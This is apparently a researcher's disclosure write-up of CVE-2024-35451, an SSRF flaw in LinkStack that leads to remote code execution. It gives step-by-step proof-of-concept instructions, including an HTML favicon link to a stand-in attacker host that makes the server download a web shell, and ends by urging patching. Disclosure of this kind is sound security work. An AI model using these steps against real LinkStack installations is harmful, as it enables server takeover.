Overview
Earlier this year, I discovered a critical vulnerability, now identified as CVE-2024–35451, in LinkStack 2.7.9–4.7.7. This vulnerability allows an authenticated attacker to achieve remote code execution (RCE), potentially taking full control of vulnerable systems.
What is SSRF
Server-Side Request Forgery (SSRF) is a web security vulnerability that allows an attacker to trick a server into making unintended requests to internal or external resources. By manipulating user input, attackers can force the server to send requests to vulnerable endpoints, potentially exposing sensitive information, compromising internal systems, or even executing malicious code.
CVE-2024–35451 Technical Details
The vulnerability lies in “resources\views\components\favicon.blade.php” file, where an authenticated attacker can manipulate user input at “link” parameter to trick the server into making requests to their own server. This allows the attacker to download malicious files, such as web shells, onto the compromised server. Once a web shell is installed, these web shells grant the attacker the ability to execute arbitrary commands, potentially seizing full control of the system.
Proof-of-Concept
1. Create an HTML file (not necessarily an HTML file) containing a link to the web shell URL.
<link rel=”shortcut icon” href=”http://attacker.local/exploit.php”>.2. Set up an HTTP server to serve both the HTML file and the web shell.
3. Log in to the LinkStack site and go to “Home > Add Link” and select “Custom Link”.
4. Enter the URL of the Python server in the “URL” field. Check the “Show website icon on button” box and save the data.
5. We can see requests coming in from LinkStack, first for the HTML file, then for the web shell.
6. After that, LinkStack will redirect to the “/studio/links” page. The custom link should now be created.
7. Use Burp Suite to intercept requests and observe LinkStack attempting to fetch a PHP file from itself, That’s the web shell!
8. Once web shell is installed, we’ve got an RCE on the system.
Conclusion
The CVE-2024–35451 we’ve explored highlights the importance of timely security patches. While this vulnerability was addressed in version 4.8.0 released in May. It’s crucial for you to maintain up-to-date software and implement robust security practices to protect against similar attacks. By staying informed about vulnerabilities and applying patches promptly, we can significantly reduce the risk of exploitation.
